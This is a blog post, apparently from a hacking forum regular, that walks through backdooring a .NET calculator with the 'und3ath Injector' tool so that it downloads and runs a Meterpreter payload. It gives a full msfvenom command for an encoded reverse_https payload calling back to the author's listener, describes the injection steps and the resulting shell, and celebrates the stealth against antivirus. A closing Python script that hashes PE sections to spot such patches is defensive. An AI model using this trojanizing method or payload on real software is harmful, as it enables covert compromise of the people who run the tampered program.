Injecting arbitrary code into .NET Assemblies using ‘und3ath Injector’
Posted on by infodox

Last night I was browsing a forum I frequent – http://trojanforge.com/ – and came across a piece of code named “und3ath Injector”, written by a user named und3ath. It claimed to be capable of injecting arbitrary code into .NET assemblies without harming the original code – in short, a stealth backdooring tool for .NET executables. The author’s article and release can be found on his blog here: http://und3ath.blogspot.fr/2012/10/source-d3ath-jector-mono-cecil-injector.html
This guy is a very good .NET programmer; I expect he will come out with more awesome things soon.

This, to me, was fascinating. It directly injects ‘evil code’ into one of the functions or forms that comprise the .NET assembly, without altering the functionality of the original. It simply sneakily adds a “Little Extra”. The fact I fucking hate .NET with a passion meant I saw a hilarious extra “Evil” side to this! A trojanizer for .NET executables? AWESOME. I had trouble in the past injecting MSF payloads into .NET binaries without breaking the original binary.

The proof of concept tool – und3ath Injector – has two payloads: a Messagebox payload and a “Trojan Downloader” payload. The first is proof the damn thing works, the second a more “weaponized” payload for dropping malware or backdoors on a victim system. One of the benefits of using a downloader instead of hiding a full backdoor in there is stealth – fewer modifications to the file, and less for an AV to sign on.

So, without further ado, I am going to inject a dropper into a .NET binary and see whether it functions as planned. The dropper will download a Meterpreter payload from a remote server, execute the payload, and we will take it from there…

Before we do anything, we will generate our Metasploit payload to run on the victim system and place it in our webroot.
The following should do the trick…

msfvenom -p windows/meterpreter/reverse_https -f exe -e x86/shikata_ga_nai -i 25 LHOST=192.168.1.41 LPORT=443 >evil.exe

This creates the executable file “evil.exe” in our current working directory. The msfvenom command should be self-explanatory, but if there is demand for it I will write an article later on using msfvenom. If you are capable of reading the f*cking manual you should get it.

[Figure: Creating the Meterpreter payload]

So we have our evil binary in /var/www/lulz ready to go. We can now move on to the main part of this article – backdooring .NET assemblies by “patching” them with extra .NET code. The victim .NET binary I chose to use is a simple calculator application. I found it online and decided it made a good enough victim for demonstration purposes. Here is a screenshot of it running, for those of you who do not know what a calculator is.

[Figure: .NET calculator]

Now, we open ‘und3ath Injector’ and select “Load File”. Use this dialogue to select the binary you wish to backdoor.

[Figure: Selecting a file to backdoor]

Next we click on any of the parts that we think would be good to inject code into (I normally choose the main class for some odd reason, though you could select an on click event…). When we click on this the “Payloader” menu comes up. We insert our information/selection here.

[Figure: Create the Payload]

When you click inject, it starts creating a new binary for you to use and you save it.

[Figure: Saving the Backdoor]

Now, we have our evil binary ready to deploy, and have our Metasploit listener ready. We run the modified binary on the victim host and haz shell.

[Figure: Got a shell =D]

So, as you can see, it is relatively trivial to inject arbitrary code into a .NET assembly without affecting the existing functionality of the software.
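
A patch that leaves the program's behaviour untouched still changes its bytes, so comparing a deployed binary against a known-good copy catches what functional testing cannot. The following is an added example, not code from the original post or from und3ath's tool: it hashes each PE section of both copies and reports which ones differ. The sample images are constructed stand-ins, and `make_pe` is a hypothetical helper that builds only enough header for the parser to walk.

```python
import hashlib
import struct

def section_hashes(pe: bytes) -> dict:
    """Map each PE section name to the SHA-256 of its raw bytes on disk."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("not a PE image")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    n_sections, = struct.unpack_from("<H", pe, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    hashes = {}
    for i in range(n_sections):
        off = table + 40 * i                  # each section header is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)
        hashes[name] = hashlib.sha256(pe[raw_ptr:raw_ptr + raw_size]).hexdigest()
    return hashes

def changed_sections(known_good: bytes, suspect: bytes) -> list:
    """Names of sections added, removed or altered relative to the known-good copy."""
    a, b = section_hashes(known_good), section_hashes(suspect)
    return sorted(n for n in a.keys() | b.keys() if a.get(n) != b.get(n))

def make_pe(sections: dict) -> bytes:
    """Hypothetical helper: constructed PE-shaped test image, not a runnable program."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew: PE header right after DOS header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    data_start = 0x40 + len(coff) + 40 * len(sections)
    table, body = b"", b""
    for name, data in sections.items():
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), 0,
                             len(data), data_start + len(body), 0, 0, 0, 0, 0)
        body += data
    return bytes(dos) + coff + table + body

# Constructed sample data standing in for the original and the patched calculator.
KNOWN_GOOD = make_pe({".text": b"IL+metadata v1", ".rsrc": b"icon", ".reloc": b"fixups"})
SUSPECT = make_pe({".text": b"IL+metadata v1 + extra method body",
                   ".rsrc": b"icon", ".reloc": b"fixups"})

if __name__ == "__main__":
    print("changed sections:", changed_sections(KNOWN_GOOD, SUSPECT))
```

In a real .NET executable the IL and metadata normally live in `.text`, so that is the section to expect in the report when a method body has been altered; the same functions accept the bytes of real files read from disk.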